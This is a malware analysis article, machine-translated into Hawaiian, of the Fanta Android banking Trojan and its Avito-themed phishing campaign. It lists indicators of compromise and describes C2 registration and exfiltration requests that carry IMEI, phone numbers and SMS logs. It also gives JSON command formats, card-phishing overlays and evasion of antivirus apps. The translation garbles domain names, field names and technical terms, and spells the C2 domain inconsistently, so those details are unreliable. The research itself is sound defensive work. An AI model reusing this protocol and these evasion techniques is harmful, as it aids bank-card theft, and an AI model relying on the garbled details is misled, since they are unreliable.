I kekahi lā makemake ʻoe e kūʻai aku i kekahi mea ma Avito a, i ka hoʻopuka ʻana i kahi wehewehe kikoʻī o kāu huahana (no ka laʻana, he module RAM), e loaʻa iā ʻoe kēia memo:
Ke kaomi nei ʻoe i ke pihi "E hoʻomau", e hoʻoiho ʻia kahi faila APK me kahi ikona a me kahi inoa hilinaʻi hilinaʻi i kāu kelepona Android. Ua hoʻokomo ʻoe i kahi noi no kekahi kumu i noi ai i nā kuleana AccessibilityService, a laila puka mai kekahi mau puka makani a nalowale koke a... ʻO ia nō.
Hele ʻoe e nānā i kāu koena, akā no kekahi kumu e noi hou ai kāu polokalamu panakō i kāu kikoʻī kāleka. Ma hope o ke komo ʻana i ka ʻikepili, hiki mai kekahi mea weliweli: no kekahi kumu i maopopo ʻole iā ʻoe, hoʻomaka ke kālā e nalowale mai kāu moʻokāki. Ke ho'āʻo nei ʻoe e hoʻoponopono i ka pilikia, akā ke kūʻē nei kāu kelepona: kaomi ʻo ia i nā kī "Back" a me "Home", ʻaʻole e pio a ʻae ʻole iā ʻoe e hoʻāla i nā hana palekana. ʻO ka hopena, ua waiho ʻia ʻoe me ke kālā ʻole, ʻaʻole i kūʻai ʻia kāu mau waiwai, kānalua ʻoe a kahaha: he aha ka mea?
He mea maʻalahi ka pane: ua lilo ʻoe i mea pōʻino i ka Android Trojan Fanta, he lālā o ka ʻohana Flexnet. Pehea i hana ai kēia? E wehewehe kākou i kēia manawa.
Nā mea kākau: Andrey Polovinkin, loea ʻōpio i ka nānā ʻana i nā polokalamu malware, ʻO Ivan Pisarev, loea i ka nānā ʻana i ka malware.
ʻO kekahi mau helu helu
Ua ʻike mua ʻia ka ʻohana Flexnet o Android Trojans i ka makahiki 2015. Ma kahi lōʻihi o ka hana, ua hoʻonui ka ʻohana i kekahi mau subspecies: Fanta, Limebot, Lipton, etc. ʻAʻole kū mālie ʻo Trojan, a me nā ʻōnaehana e pili ana iā ia: ke kūkulu ʻia nei nā papa hana hoʻolaha maikaʻi hou - i kā mākou hihia, nā ʻaoʻao phishing kiʻekiʻe e kuhikuhi ana i kahi mea kūʻai aku mea hoʻohana, a hahai nā mea hoʻomohala Trojan i nā ʻano hiʻohiʻona. kākau virus - hoʻohui i nā hana hou e hiki ai ke ʻaihue i ke kālā maikaʻi loa mai nā mea maʻi a me nā ʻōnaehana pale.
ʻO ka hoʻolaha i wehewehe ʻia ma kēia ʻatikala e pili ana i nā mea hoʻohana mai Rusia; ua hoʻopaʻa ʻia kahi helu liʻiliʻi o nā mea maʻi ma Ukraine, a ʻoi aku ka liʻiliʻi ma Kazakhstan a me Belarus.
ʻOiai ʻo Flexnet i loko o ka Android Trojan arena no nā makahiki he 4 i kēia manawa a ua aʻo ʻia i nā kikoʻī e nā mea noiʻi he nui, aia nō ke ʻano maikaʻi. E hoʻomaka ana mai Ianuali 2019, ʻoi aku ka nui o ka pōʻino ma mua o 35 miliona rubles - a ʻo kēia wale nō no nā hoʻolaha ma Rūsia. I ka makahiki 2015, ua kūʻai ʻia nā ʻano like ʻole o kēia Android Trojan ma lalo o nā ʻaha kūkā, kahi e ʻike ʻia ai ke kumu kumu o ka Trojan me kahi wehewehe kikoʻī. ʻO ke ʻano kēia, ʻoi aku ka maikaʻi o nā helu o ka pōʻino i ka honua. ʻAʻole ia he hōʻailona maikaʻi ʻole no kēlā ʻelemakule, ʻeā?
Mai ke kūʻai aku i ka hoʻopunipuni
E like me ka ʻike ʻia mai ka kiʻi kiʻi i hōʻike mua ʻia o kahi ʻaoʻao phishing no ka lawelawe pūnaewele no ka hoʻolaha ʻana i nā hoʻolaha Avito, ua hoʻomākaukau ʻia no kahi mea i pepehi ʻia. ʻIke ʻia, hoʻohana nā mea hoʻouka i kekahi o nā parser a Avito, ka mea e unuhi i ka helu kelepona a me ka inoa o ka mea kūʻai aku, a me ka wehewehe ʻana o ka huahana. Ma hope o ka hoʻonui ʻana i ka ʻaoʻao a me ka hoʻomākaukau ʻana i ka faila APK, hoʻouna ʻia ka mea i pepehi ʻia i kahi SMS me kona inoa a me kahi loulou i kahi ʻaoʻao phishing e loaʻa ana kahi wehewehe o kāna huahana a me ka nui i loaʻa mai ka "kūʻai" o ka huahana. Ma ke kaomi ʻana i ke pihi, loaʻa ka mea hoʻohana i kahi faila APK maikaʻi ʻole - Fanta.
Ua hōʻike ʻia kahi haʻawina o ka shcet491[.]ru domain i hāʻawi ʻia i nā kikowaena DNS a Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Aia i loko o ka waihona wahi kikowaena nā mea e kuhikuhi ana i nā helu IP 31.220.23[.]236, 31.220.23[.]243, a me 31.220.23[.]235. Eia nō naʻe, kuhikuhi ka moʻolelo kumu waiwai mua (He moʻolelo) i kahi kikowaena me ka helu IP 178.132.1[.]240.
ʻO ka helu IP 178.132.1[.]240 aia ma Netherlands a no ka mea hoʻokipa. Kahawai Honua. ʻO nā helu IP 31.220.23[.]235, 31.220.23[.]236 a me 31.220.23[.]243 aia ma UK a pili i ka server hoʻokipa like HOSTINGER. Hoʻohana ʻia i mea hoʻopaʻa moʻolelo openprov-ru. Ua hoʻoholo pū ʻia nā kāʻei kapu i ka IP address 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Pono e hoʻomaopopo ʻia ua loaʻa nā loulou i kēia ʻano mai kahi kokoke i nā kikowaena āpau:
http://(www.){0,1}<%domain%>/[0-9]{7}
Aia pū kekahi loulou mai kahi leka SMS i kēia laʻana. Ma muli o ka ʻikepili mōʻaukala, ua ʻike ʻia ua pili kekahi domain i kekahi mau loulou i ke ʻano i hōʻike ʻia ma luna nei, e hōʻike ana ua hoʻohana ʻia kahi domain e puʻunaue i ka Trojan i kekahi mau mea i hoʻopilikia ʻia.
E lele i mua: ʻo ka Trojan i hoʻoiho ʻia ma o kahi loulou mai kahi SMS e hoʻohana i ka helu wahi ma ke ʻano he kikowaena mana onusedseddohap[.]club. Ua hoʻopaʻa inoa ʻia kēia kahua ma 2019-03-12, a e hoʻomaka ana mai 2019-04-29, ua pili nā noi APK me kēia kikowaena. Ma muli o ka ʻikepili i loaʻa mai VirusTotal, he 109 mau noi i hui pū me kēia kikowaena. Ua hoʻoholo ka domain ponoʻī i ka helu IP 217.23.14[.]27, aia ma Netherlands a nona ka hoster Kahawai Honua. Hoʻohana ʻia i mea hoʻopaʻa moʻolelo KEANANAAP. Ua hoʻoholo ʻia nā kāʻei kapu i kēia helu IP lāʻau ʻino-racoon[.] (e hoʻomaka ana mai 2018-09-25) a kino-racoon[.]ola (e hoʻomaka ana mai 2018-10-25). Me ka waihona lāʻau ʻino-racoon[.] ʻoi aku ma mua o 80 mau faila APK i launa pū me kino-racoon[.]ola - ʻoi aku ma mua o 100.
Ma keʻano laulā, holo ka hoʻouka ʻana penei:
He aha ka mea ma lalo o ke poʻi o Fanta?
E like me nā Android Trojans ʻē aʻe, hiki iā Fanta ke heluhelu a hoʻouna i nā leka SMS, hana i nā noi USSD, a hōʻike i kāna mau puka makani ma luna o nā noi (me nā waihona kālā). Eia naʻe, ua hōʻea mai ka arsenal o ka hana o kēia ʻohana: ua hoʻomaka ʻo Fanta e hoʻohana AccessibilityService no nā kumu like ʻole: heluhelu i nā ʻike o nā leka mai nā noi ʻē aʻe, ka pale ʻana i ka ʻike ʻana a me ka hoʻōki ʻana i ka hoʻokō ʻana i kahi Trojan ma kahi mea maʻi, etc. Hana ʻo Fanta ma nā mana āpau o Android ʻaʻole ʻoi aku ma mua o 4.4. Ma kēia ʻatikala e nānā pono mākou i ka laʻana Fanta aʻe:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Ma hope koke o ka hoʻomaka ʻana
Ma hope koke o ka hoʻomaka ʻana, hūnā ka Trojan i kāna kiʻi. Hiki ke hana wale ka palapala noi inā ʻaʻole ka inoa o ka mea maʻi i ka papa inoa:
- android_x86
- ʻO VirtualBox
- Nexus 5X
- Nexus 5
Hana ʻia kēia nānā ma ka lawelawe nui o ka Trojan - MainService. I ka hoʻomaka ʻana no ka manawa mua, ua hoʻomaka ʻia nā ʻāpana hoʻonohonoho o ka noi i nā waiwai paʻamau (ʻo ke ʻano no ka mālama ʻana i ka ʻikepili hoʻonohonoho a me ko lākou manaʻo e kūkākūkā ʻia ma hope), a ua hoʻopaʻa inoa ʻia kahi mea maʻi hou ma ka server control. E hoʻouna ʻia kahi noi HTTP POST me ke ʻano memo i ke kikowaena kakau_bot a me ka ʻike e pili ana i ka mea i maʻi ʻia (Android version, IMEI, helu kelepona, inoa mea hoʻohana a me ke code ʻāina kahi i hoʻopaʻa inoa ʻia ai ka mea hoʻokele). Hoʻohana ka helu wahi i ke kikowaena mana hXXp://onuseseddohap[.]club/controller.php. I ka pane ʻana, hoʻouna ke kikowaena i kahi leka i loaʻa nā māla bot_id, bot_pwd, kikowaena - mālama ka noi i kēia mau waiwai ma ke ʻano he mau ʻāpana o ka server CnC. ʻĀpana kikowaena koho inā ʻaʻole i loaʻa ke kahua: Hoʻohana ʻo Fanta i ka helu inoa inoa - hXXp://onuseseddohap[.]club/controller.php. Hiki ke hoʻohana ʻia ka hana o ka hoʻololi ʻana i ka helu CnC no ka hoʻoponopono ʻana i nā pilikia ʻelua: e puʻunaue like i ka ukana ma waena o kekahi mau kikowaena (inā he nui nā mea maʻi maʻi, hiki ke kiʻekiʻe ka ukana ma kahi kikowaena pūnaewele unoptimized), a me ka hoʻohana ʻana. he kikowaena ʻē aʻe i ka wā i hāʻule ʻole ai kekahi o nā kikowaena CnC.
Inā loaʻa kahi hewa i ka hoʻouna ʻana i ka noi, e hana hou ka Trojan i ke kaʻina hoʻopaʻa inoa ma hope o 20 kekona.
Ke hoʻopaʻa inoa ʻia ka hāmeʻa, e hōʻike ʻo Fanta i kēia memo i ka mea hoʻohana:
Manaʻo nui: kāhea ʻia ka lawelawe Palekana pūnaewele - ka inoa o ka lawelawe Trojan, a ma hope o ke kaomi ʻana i ke pihi OK E wehe ʻia kahi puka aniani me nā hoʻonohonoho Accessibility o ka mea maʻi, kahi e hāʻawi ai ka mea hoʻohana i nā kuleana Accessibility no ka lawelawe ʻino:
Ke hoʻomaka koke ka mea hoʻohana AccessibilityService, Loaʻa iā Fanta ke komo i nā mea o ka puka makani noi a me nā hana i hana ʻia i loko o ia mau mea:
Ma hope koke o ka loaʻa ʻana o nā kuleana Accessibility, noi ka Trojan i nā kuleana luna a me nā kuleana e heluhelu i nā leka hoʻomaopopo:
Ke hoʻohana nei i ka AccessibilityService, hoʻohālikelike ka palapala noi i nā kī kī, a laila hāʻawi iā ia iho i nā pono āpau.
Hoʻokumu ʻo Fanta i nā manawa ʻikepili he nui (e wehewehe ʻia ma hope) pono e mālama i ka ʻikepili hoʻonohonoho, a me ka ʻike i hōʻiliʻili ʻia i ke kaʻina e pili ana i ka mea maʻi. No ka hoʻouna ʻana i ka ʻike i hōʻiliʻili ʻia, hana ka Trojan i kahi hana hou i hoʻolālā ʻia e hoʻoiho i nā kahua mai ka waihona a loaʻa kahi kauoha mai ke kikowaena mana. Hoʻonohonoho ʻia ka manawa no ke komo ʻana iā CnC ma muli o ka mana o ka Android: i ka hihia o 5.1, ʻo 10 kekona ka manawa, a i ʻole 60 kekona.
No ka loaʻa ʻana o ke kauoha, hana ʻo Fanta i kahi noi GetTask i ke kikowaena hooponopono. Ma ka pane, hiki iā CnC ke hoʻouna i kekahi o kēia mau kauoha:
hui | hōʻikeʻano |
---|---|
0 | E hoʻouna i ka leka uila |
1 | E kelepona i ke kelepona a i ʻole ke kauoha USSD |
2 | Hoʻohou i kahi ʻāpana wā mawaena |
3 | Hoʻohou i kahi ʻāpana ʻaeʻia |
6 | Hoʻohou i kahi ʻāpana smsManager |
9 | Hoʻomaka e ʻohi i nā memo SMS |
11 | Hoʻihoʻi hou i kāu kelepona i nā hoʻonohonoho hale hana |
12 | E ho'ā/E ho'opau i ka hana 'ana i ka pahu kama'ilio |
ʻOhi pū ʻo Fanta i nā leka hoʻomaopopo mai 70 mau polokalamu panakō, nā ʻōnaehana uku wikiwiki a me nā e-wallets a mālama iā lākou i kahi waihona.
Mālama i nā ʻāpana hoʻonohonoho
No ka mālama ʻana i nā ʻāpana hoʻonohonoho, hoʻohana ʻo Fanta i kahi ala maʻamau no ka platform Android - Kāu Mau koho Paʻamau- nā waihona. E mālama ʻia nā hoʻonohonoho i kahi faila i kapa ʻia Mau koho Paʻamau. Aia ka wehewehe ʻana o nā ʻāpana i mālama ʻia ma ka papa ma lalo.
inoa | Waiwai paʻamau | Nā waiwai kūpono | hōʻikeʻano |
---|---|---|---|
id | 0 | Pūnaewele | Bot ID |
kikowaena | hXXp://onuseseddohap[.]club/ | URL | E mālama i ka helu kikowaena |
pwd | - | kaula | ʻŌlelo huna kikowaena |
wā mawaena | 20 | Pūnaewele | Kūlana manawa. E hōʻike ana i ka lōʻihi o ka hoʻopaneʻe ʻana i kēia mau hana:
|
ʻaeʻia | a pau | pau/telNumber | Inā like ke kahua me ke kaula a pau ai ole ia, telNumber, a laila e kāpae ʻia ka leka SMS i loaʻa e ka noi a ʻaʻole hōʻike ʻia i ka mea hoʻohana |
smsManager | 0 | 0/1 | E hoʻā a hoʻopau i ka noi ma ke ʻano he mea hoʻokipa SMS paʻamau |
readDialog | wahahee | ʻOiaʻiʻo/hewa | E hoʻā/Hoʻopau i ka hoʻopaʻa inoa hanana HikinaHana |
Hoʻohana pū ʻo Fanta i ka faila smsManager:
inoa | Waiwai paʻamau | Nā waiwai kūpono | hōʻikeʻano |
---|---|---|---|
pckg | - | kaula | Ka inoa o ka luna leka SMS i hoʻohana ʻia |
Ka launa pū me nā waihona
I ka wā o kāna hana, hoʻohana ka Trojan i ʻelua mau waihona. Kapa ʻia ka waihona a hoʻohana ʻia e mālama i nā ʻike like ʻole i hōʻiliʻili ʻia mai ke kelepona. Ua kapa ʻia ka lua waihona fanta.db a hoʻohana ʻia e mālama i nā hoʻonohonoho kuleana no ka hana ʻana i nā puka makani phishing i hoʻolālā ʻia e hōʻiliʻili i ka ʻike e pili ana i nā kāleka panakō.
Hoʻohana ʻo Trojan i ka waihona а e mālama i ka ʻike i hōʻiliʻili ʻia a hoʻopaʻa inoa i kāu mau hana. Mālama ʻia ka ʻikepili ma kahi pākaukau nā papa. No ka hana ʻana i papaʻaina, e hoʻohana i kēia nīnau SQL:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)
Aia ka ʻikepili i kēia mau ʻike:
1. Hoʻopaʻa inoa i ka hoʻomaka ʻana o ka mea maʻi me kahi leka Huli ke kelepona!
2. Nā hoʻolaha mai nā noi. Hana ʻia ka memo e like me ke ʻano ma lalo nei:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Nā ʻikepili kāleka panakō mai nā palapala phishing i hana ʻia e ka Trojan. ʻĀpana VIEW_NAME ʻo ia paha kekahi o kēia mau mea:
- 'OAEExpress
- ʻO Avito
- Google Play
- Nā ʻano like ʻole <%App Name%>
Hoʻopaʻa ʻia ka memo ma ke ʻano:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Nā memo SMS komo/puka ma ke ʻano:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. ʻIke e pili ana i ka pūʻolo i hana i ka pahu kamaʻilio ma ke ʻano:
(<%Package name%>)<%Package information%>
Pākaukau laʻana nā papa:
ʻO kekahi o ka hana o Fanta ka hōʻiliʻili o ka ʻike e pili ana i nā kāleka panakō. Loaʻa ka hōʻiliʻili ʻikepili ma o ka hana ʻana i nā puka makani phishing i ka wā e wehe ai i nā noi panakō. Hoʻokahi wale nō hana ʻo Trojan i ka puka makani phishing. Mālama ʻia ka ʻike i hōʻike ʻia i ka puka makani i ka mea hoʻohana ma kahi pākaukau Mau koho Paʻamau i ka waihona pūnaewele fanta.db. No ka hana ʻana i kahi waihona, e hoʻohana i kēia nīnau SQL:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);
Nā kahua pākaukau a pau Mau koho Paʻamau ma ka paʻamau i hoʻomaka ʻia i ka 1 (hana i kahi puka phishing). Ma hope o ka hoʻokomo ʻana o ka mea hoʻohana i kā lākou ʻikepili, e hoʻonohonoho ʻia ka waiwai i 0. Ka laʻana o nā kahua papaʻaina Mau koho Paʻamau:
- hiki_komo - ke kuleana o ke kahua no ka hōʻike ʻana i ke ʻano i ka wā e wehe ai i kahi noi panakō
- first_bank - ʻaʻole i hoʻohana ʻia
- hiki_avito - ke kuleana o ke kahua no ka hōʻike ʻana i ka palapala i ka wā e wehe ai i ka noi Avito
- hiki_ali - ke kuleana o ke kahua no ka hōʻike ʻana i ke ʻano i ka wā e wehe ai i ka noi Aliexpress
- hiki_kekahi - ke kuleana o ke kahua no ka hōʻike ʻana i ka palapala i ka wā e wehe ai i kekahi noi mai ka papa inoa: ʻO Yula, Pandao, Drom Auto, Wallet. Nā kāleka hōʻemi a me nā bonus, Aviasales, Booking, Trivago
- can_card - ke kuleana o ke kahua no ka hōʻike ʻana i ke ʻano i ka wā e wehe ai Google Play
Ka launa pū me ke kikowaena hoʻokele
Loaʻa ka pilina pūnaewele me ke kikowaena hoʻokele ma o ka protocol HTTP. No ka hana pū me ka pūnaewele, hoʻohana ʻo Fanta i ka waihona Retrofit kaulana. Hoʻouna ʻia nā noi i: hXXp://onuseseddohap[.]club/controller.php. Hiki ke hoʻololi i ka helu kikowaena i ke kau inoa ʻana ma ke kikowaena. Hiki ke hoʻouna ʻia nā kuki ma ka pane mai ke kikowaena. Hana ʻo Fanta i kēia mau noi i ke kikowaena:
- Hoʻopaʻa inoa ʻia ka bot ma ke kikowaena hoʻomalu i hoʻokahi manawa, ma ka hoʻomaka mua ʻana. Hoʻouna ʻia ka ʻikepili e pili ana i ka mea maʻi i ke kikowaena:
· ka wai huaʻai - nā kuki i loaʻa mai ke kikowaena (ʻo ka waiwai paʻamau he kaula ʻole)
· ano — kaula mau kakau_bot
· pā mua — integer mau 2
· version_sdk - ua hoʻokumu ʻia e like me ke ʻano ma lalo nei: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· imei - IMEI o ka mea maʻi
· aina — code o ka ʻāina kahi i hoʻopaʻa inoa ʻia ai ka mea hoʻohana, ma ke ʻano ISO
· helu - helu kelepona
· Aʻole - inoa mea hoʻohanaHe laʻana o kahi noi i hoʻouna ʻia i ke kikowaena:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
I ka pane ʻana i ka noi, pono e hoʻihoʻi ke kikowaena i kahi mea JSON i loaʻa nā ʻāpana penei:
· bot_id - ID o ka mea i hoʻopili ʻia. Inā like ka bot_id me 0, e hoʻokō hou ʻo Fanta i ka noi.
bot_pwd — ʻōlelo huna no ke kikowaena.
kikowaena — hoʻomalu i ka helu kikowaena. ʻāpana koho. Inā ʻaʻole i kuhikuhi ʻia ka ʻāpana, e hoʻohana ʻia ka helu wahi i mālama ʻia ma ka noi.Laʻana JSON mea:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Noi e loaʻa kahi kauoha mai ke kikowaena. Hoʻouna ʻia kēia ʻikepili i ke kikowaena:
· ka wai huaʻai - nā kuki i loaʻa mai ke kikowaena
· haʻi - id o ka mea maʻi i loaʻa i ka hoʻouna ʻana i ke noi kakau_bot
· pwd — ʻōlelo huna no ke kikowaena
· māhele_admin - e hoʻoholo ke kahua inā ua loaʻa nā kuleana luna. Inā loaʻa nā kuleana luna hoʻomalu, ua like ke kahua me 1, i ole ia 0
· Accessibility — Ke kūlana hana lawelawe Accessibility. Inā hoʻomaka ka lawelawe, ʻo ka waiwai 1, i ole ia 0
· SMSManager - hōʻike inā hiki ke Trojan ma ke ʻano he palapala paʻamau no ka loaʻa ʻana o SMS
· paku - hōʻike i ke kūlana o ka pale. E hoʻonoho ʻia ka waiwai 1, inā aia ka pale, inā ʻaʻole 0;He laʻana o kahi noi i hoʻouna ʻia i ke kikowaena:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
Ma muli o ke kauoha, hiki i ke kikowaena ke hoʻihoʻi i kahi mea JSON me nā ʻāpana like ʻole:
· hui E hoʻouna i ka leka uila: Aia i loko o nā palena ka helu kelepona, ka kikokikona o ka leka SMS a me ka ID o ka memo i hoʻouna ʻia. Hoʻohana ʻia ka mea ʻike i ka hoʻouna ʻana i kahi leka i ke kikowaena me ke ʻano setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }
· hui E kelepona i ke kelepona a i ʻole ke kauoha USSD: Aia ka helu kelepona a i ʻole ke kauoha ma ke kino pane.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }
· hui E hoʻololi i ka palena waena.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }
· hui Hoʻololi i ka ʻāpana hoʻokaʻawale.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }
· hui E hoʻololi i ke kahua SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }
· hui E hōʻiliʻili i nā memo SMS mai kahi mea maʻi.
{ "response": [ { "mode": 9 } ], "status":"ok" }
· hui Hoʻihoʻi hou i kāu kelepona i nā hoʻonohonoho hale hana:
{ "response": [ { "mode": 11 } ], "status":"ok" }
· hui E hoʻololi i ka ʻāpana ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Hoʻouna ʻana i kahi memo me ke ʻano setSmsStatus. Hana ʻia kēia noi ma hope o ka hoʻokō ʻia ʻana o ke kauoha E hoʻouna i ka leka uila. Penei ke ano o ka noi:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>
- Ke hoʻouka nei i nā ʻikepili waihona. Hoʻokahi lālani e hoʻouna ʻia i kēlā me kēia noi. Hoʻouna ʻia kēia ʻikepili i ke kikowaena:
· ka wai huaʻai - nā kuki i loaʻa mai ke kikowaena
· ano — kaula mau setSaveInboxSms
· haʻi - id o ka mea maʻi i loaʻa i ka hoʻouna ʻana i ke noi kakau_bot
· kikokikona — kikokiko i loko o ka waihona waihona o kēia manawa (field d mai ka papaʻaina nā papa i ka waihona pūnaewele а)
· helu — inoa o ka waihona waihona o kēia manawa (field p mai ka papaʻaina nā papa i ka waihona pūnaewele а)
· sms_mode — waiwai integer (field m mai ka papaʻaina nā papa i ka waihona pūnaewele а)Penei ke ano o ka noi:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
Inā hoʻouna maikaʻi ʻia i ke kikowaena, e holoi ʻia ka lālani mai ka papaʻaina. Ka laʻana o kahi mea JSON i hoʻihoʻi ʻia e ke kikowaena:
{ "response":[], "status":"ok" }
Ka launa pū me AccessibilityService
Ua hoʻokō ʻia ka AccessibilityService i mea e maʻalahi ai ka hoʻohana ʻana i nā polokalamu Android no ka poʻe me ke kino kīnā. I ka hapanui o nā hihia, pono ka pilina kino e launa pū me kahi noi. Hāʻawi ka AccessibilityService iā ʻoe e hana ma ka papahana. Hoʻohana ʻo Fanta i ka lawelawe e hana i nā puka makani hoʻopunipuni i nā noi panakō a pale i nā mea hoʻohana mai ka wehe ʻana i nā ʻōnaehana ʻōnaehana a me kekahi mau noi.
Ke hoʻohana nei i ka hana o ka AccessibilityService, nānā ka Trojan i nā loli i nā mea ma ka pale o ka mea maʻi. E like me ka mea i hōʻike mua ʻia, aia nā hoʻonohonoho Fanta i kahi ʻāpana kuleana no ka hana logging me nā pahu kamaʻilio - readDialog. Inā hoʻonohonoho ʻia kēia ʻāpana, e hoʻohui ʻia ka ʻike e pili ana i ka inoa a me ka wehewehe ʻana o ka pūʻolo i hoʻomaka i ka hanana. Hana ka Trojan i kēia mau hana i ka wā e hoʻomaka ai nā hanana:
- Hoʻohālikelike i ke kaomi ʻana i ke kua a me nā kī home i kēia mau hihia:
· inā makemake ka mea hoʻohana e hoʻomaka hou i kāna hāmeʻa
· inā makemake ka mea hoʻohana e holoi i ka noi "Avito" a i ʻole e hoʻololi i nā kuleana komo
· inā loaʻa kahi ʻōlelo o ka noi "Avito" ma ka ʻaoʻao
· i ka wā e wehe ai i ka polokalamu Google Play Protect
· i ka wehe ʻana i nā ʻaoʻao me nā hoʻonohonoho AccessibilityService
· ke ʻike ʻia ka pahu kamaʻilio System Security
· i ka wehe ʻana i ka ʻaoʻao me nā hoʻonohonoho "Draw over other app".
· i ka wehe ʻana i ka ʻaoʻao "Applications", "Recovery and reset", "Data reset", "Reset settings", "Developer panel", "Special. nā manawa kūpono", "Nā manawa kūikawā", "Nā kuleana kūikawā"
· inā ua hana ʻia ka hanana e kekahi mau noi.Ka papa inoa o nā noi
- ANDROID
- Kumu Lite
- Mālamalama maʻemaʻe
- Master maʻemaʻe no ka CPU x86
- Hoʻokele ʻae noi noi Meizu
- Palekana MIUI
- Luna Hoʻomaʻemaʻe - Antivirus & Cache a me ka mea holoi ʻōpala
- Nā mana makua a me GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Mea hoʻomaʻemaʻe Virus, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus & palekana palekana 2019
- Mobile Security MegaFon
- Palekana AVG no Xperia
- Palekana Mobile
- Malwarebytes antivirus & pale
- Antivirus no ka Android 2019
- Luna Palekana - Antivirus, VPN, AppLock, Booster
- ʻO AVG antivirus no Huawei papa Pūnaewele Pūnaewele
- Samsung Accessibility
- ʻO Samsung Smart Manager
- Pūnaewele palekana
- ʻO Booster wikiwiki
- Kauka Dr.Web
- Wahi palekana ʻo Dr.Web
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirus & Mobile palekana
- Kaspersky Internet Security: Antivirus a me ka palekana
- ʻO Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security - palekana a me ka hoʻokele
- AVG Antivirus manuahi 2019 - Palekana no Android
- Hoʻolālā Android
- ʻO Norton Mobile Security a me ka Antivirus
- Antivirus, pā ahi, VPN, palekana kelepona
- Palekana Mobile: antivirus, VPN, pale ʻaihue
- Antivirus no ka Android
- Inā noi ʻia ka ʻae i ka hoʻouna ʻana i kahi leka SMS i kahi helu pōkole, hoʻohālikelike ʻo Fanta i ke kaomi ʻana i ka pahu pahu E hoʻomanaʻo i ke koho a me ka pihi hoʻouna.
- Ke hoʻāʻo ʻoe e lawe i nā kuleana luna mai ka Trojan, hoʻopaʻa ia i ka pale kelepona.
- Kāohi i ka hoʻohui ʻana i nā luna hoʻoponopono hou.
- Inā ʻo ka polokalamu antivirus dr.web ʻike ʻia kahi hoʻoweliweli, hoʻohālike ʻo Fanta i ke kaomi ʻana i ke pihi haʻalele.
- Hoʻohālikelike ka Trojan i ke kaomi ʻana i ke pihi kua a me ka home inā i hana ʻia ka hanana e ka noi Mālama Pūnaewele Samsung.
- Hana ʻo Fanta i nā puka makani phishing me nā palapala no ka hoʻokomo ʻana i ka ʻike e pili ana i nā kāleka panakō inā i hoʻomaka ʻia kahi noi mai kahi papa inoa o kahi 30 mau lawelawe pūnaewele like ʻole. Ma waena o lākou: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.
Nā Palapala Phishing
Nānā ʻo Fanta i nā noi e holo nei ma ka mea maʻi. Inā wehe ʻia kahi noi hoihoi, hōʻike ka Trojan i kahi puka phishing ma luna o nā mea ʻē aʻe, ʻo ia ke ʻano no ke komo ʻana i ka ʻike kāleka panakō. Pono ka mea hoʻohana e hoʻokomo i kēia ʻikepili:
- Helu kāleka
- Ka lā pau o ke kāleka
- ʻO CVV
- Ka inoa o ka mea paʻa kāleka (ʻaʻole no nā panakō a pau)
